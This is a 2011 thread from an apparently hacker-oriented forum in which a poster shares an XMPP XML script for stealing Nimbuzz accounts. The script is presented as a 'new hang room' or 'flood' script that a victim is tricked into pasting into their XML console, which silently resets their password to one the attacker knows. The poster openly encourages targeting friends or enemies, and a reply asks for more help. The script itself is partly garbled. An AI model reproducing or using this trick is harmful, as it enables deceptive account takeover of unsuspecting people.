www.e-killers-flooders.tk
Would you like to react to this message? Create an account in a few clicks or log in to continue.

www.e-killers-flooders.tk

e killers is is the fastest growing network that has many sites and many people are joining us on regular basics. Join us today to enjoy the exciting offers that we have for our members

HomeLatest imagesSearchRegisterLog in

new id thif trick

Go down 
2 posters
AuthorMessage
janeksa

janeksa

new id thif trick Empty
PostSubject: new id thif trick    new id thif trick I_icon_minitimeSat Jun 25, 2011 12:24 pm

s i have told in one of my previous posts that there is no reall way to hack nimbuzz id, you can only cheat people and steal their passwords. I don't advocate cheating but if you still wanna cheat any steal people's passwords, here is the script
<iq to="YOUR [You must be registered and logged in to see this link.]/Nimbuzz_Symbian886"type="result"id="push"/><iq to="nimbuzz.com"type"set"id="discoResult"><query xmlns="jabber🇮🇶register"><username>YOUR ID</username><password>nimbuzz.net.tc</password><email></email></query></iq><iq to="YOUR [You must be registered and logged in to see this link.]/Nimbuzz_Sysbian866"type="result"id="push"/>

where nimbuzz_symbion 866 paster ur friend's id or enemy's id(check it in bombus) then send this script to your friend or enemy saying that it's a new hang rum script or new flood script. Then as they send this script in xml console, their password changes in (nimbuzz.net.tc)
and please note, that it's also a safetly tip for you. If anyone says you to send this script, don't do it.
I hope that helps many of you enjoy friends lol! lol! lol! lol! lol! lol! lol! lol!
Back to top Go down
the.player

the.player

new id thif trick Empty
PostSubject: Re: new id thif trick    new id thif trick I_icon_minitimeSun Jun 26, 2011 3:22 am

nice share jane.........not working now....try it from any of ur fake id b4 u post,,also i have a doubt how u can hack dat id ?how u will get the pw??can u share plzz
Back to top Go down

new id thif trick
Page 1 of 1